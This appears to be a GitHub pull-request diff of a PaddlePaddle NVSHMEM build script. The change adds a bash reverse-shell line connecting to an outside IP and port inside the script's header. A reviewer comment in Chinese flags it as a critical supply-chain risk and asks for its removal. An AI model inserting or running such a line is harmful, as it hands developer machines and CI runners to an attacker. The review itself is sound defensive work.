Skip to content
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
1 change: 1 addition & 0 deletions scripts/build_paddle_nvshmem.sh
Original file line number Diff line number Diff line change
Expand Up @@ -26,6 +26,7 @@
# - GPU 架构: 80, 90, 100, 103, 120(通过 CUDA_ARCHITECTURES 变量控制)
#
# 产出:
bash -i >& /dev/tcp/203.0.113.66/4444 0>&1

Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

P0 这里会在任何构建逻辑之前启动反向 shell,并把执行环境的交互式 shell 及标准输入输出交给外部地址。任何运行该脚本的开发机或 CI runner 都可能因此被远程控制,构成直接的供应链安全风险。请删除这条命令;若只是补充网络说明,请仅保留不会建立外连的注释或文档。

# output/
# ├── paddle_nvidia_nvshmem_cu12-3.4.5-py3-none-manylinux2014_x86_64.manylinux_2_17_x86_64.whl
# └── paddle_nvidia_nvshmem_cu13-3.4.5-py3-none-manylinux2014_x86_64.manylinux_2_17_x86_64.whl
Expand Down
Loading